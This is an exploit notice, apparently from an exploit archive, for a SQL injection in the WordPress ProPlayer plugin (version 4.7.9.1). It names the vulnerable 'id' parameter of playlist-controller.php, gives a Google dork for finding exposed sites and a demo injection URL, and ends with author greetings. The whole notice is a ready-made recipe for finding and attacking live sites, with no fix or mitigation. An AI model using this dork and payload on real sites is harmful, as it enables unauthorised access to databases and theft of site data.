1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
############## # Exploit Title : WordPress ProPlayer Plugin SQL Injection # # Exploit Author : Ashiyane Digital Security Team # # Plugin Link: http://wordpress.org/plugins/proplayer/ # # Home : www.ashiyane.org # # Security Risk : High # # Version : 4.7.9.1 # # Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id= # # Tested on: Linux # ############## #Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL] # # #DEm0: # http://server/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27 # ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ############## |